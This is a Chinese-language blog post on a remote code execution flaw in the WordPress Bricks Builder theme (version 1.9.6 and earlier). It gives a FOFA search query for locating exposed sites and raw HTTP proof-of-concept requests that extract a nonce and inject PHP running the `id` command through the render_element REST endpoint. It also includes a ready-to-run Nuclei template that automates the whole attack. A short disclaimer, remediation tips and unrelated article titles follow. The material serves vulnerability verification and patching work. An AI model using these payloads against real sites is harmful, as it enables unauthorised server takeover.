当前位置：首页 > news >正文

WordPres Bricks Builder 前台RCE漏洞

news 2026/3/30 5:20:16

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Bricks Builder是一款用于WordPress的开发主题，提供直观的拖放界面，用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计，无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能，使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素，例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站，无论是个人博客、商业网站还是电子商务平台。

由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。

影響版本

Brick Builder 主题在低于<= 1.9.6

Ⅱ、fofa语句

body="/wp-content/themes/bricks/"

Ⅲ、漏洞复现

POC-1

GET / HTTP/1.1
Host: 127.0.0.1

POC-2

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Content-Type: application/json{"postId": "1","nonce": "dc50d26123","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}
}

1、构建 POC，获取nonce值

2、使用第一步获取的nonce值构造数据包，执行RCE

Ⅳ、Nuclei-POC

id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body="/wp-content/themes/bricks/"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{"postId": "1","nonce": "{{path}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}}extractors:- type: regexname: pathgroup: 1regex:- '"nonce":"(\w*)"'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Exception","gid=","uid=")

Ⅴ、修复建议

1、关闭互联网暴露面或接口设置访问权限

2、部署WAF对站点路径进行防护

3、将Bricks Builder组件升级只安全版本

WordPres Bricks Builder 前台RCE漏洞

相关文章：

WordPres Bricks Builder 前台RCE漏洞

渗透测试—信息收集

安卓adb调试备忘录

【软件架构】01-架构的概述

Vue 图片轮播第三方库介绍

设置主从复制时发生报错Could not find first log file name in binary log index file‘；解决方案

React Context的使用方法

ElasticSearch索引数据备份与恢复

kubernetes日志收集 fluent-operator 动态索引名的实现

pip换源

7.（数据结构）堆

AWS Elastic Beanstalk通过应用负载均衡配置https

AC自动机：文本搜索的加速器

备战蓝桥杯---基础算法刷题1

探索 Flutter 中的动画：使用 flutter_animate

装机容量对光伏发电量的影响有多大？如何通过装机容量计算发电量？

软考37-上午题-【数据库】-数据模型、数据库的三级模式和二级映像

06 分频器设计

力扣hot100题解（python版7-9题）

ECMAScript 6+ 新特性 ( 四 ) 迭代器与生成器

Windows下用MSYS2编译axel多线程下载工具的保姆级教程（附常见错误解决方案）

智能车小白也能懂的舵机PD控制：从电感差比和到方向控制，保姆级避坑指南

为Jetson AGX添加自定义硬件：手把手编写设备树节点驱动LED与PPS

（三）谷歌浏览器结合Selenium IDE实现自动化脚本录制与Python导出

NumPy 应用实例：用户行为数据分析（归一化和标准化处理）

3分钟从想法到3D模型：Hunyuan3D-2如何帮你实现创作自由

DeOldify图像上色服务快速上手：3步搭建个人老照片修复站

别再手动装Office了！用Docker和LinuxServer.io镜像，5分钟搞定LibreOffice在线办公环境

OpenClaw技能市场巡礼：Qwen3-32B生态实用工具

浪潮 NF5270M4 装 ESXi 8.0 识别不到 RAID1？这样设置一次搞定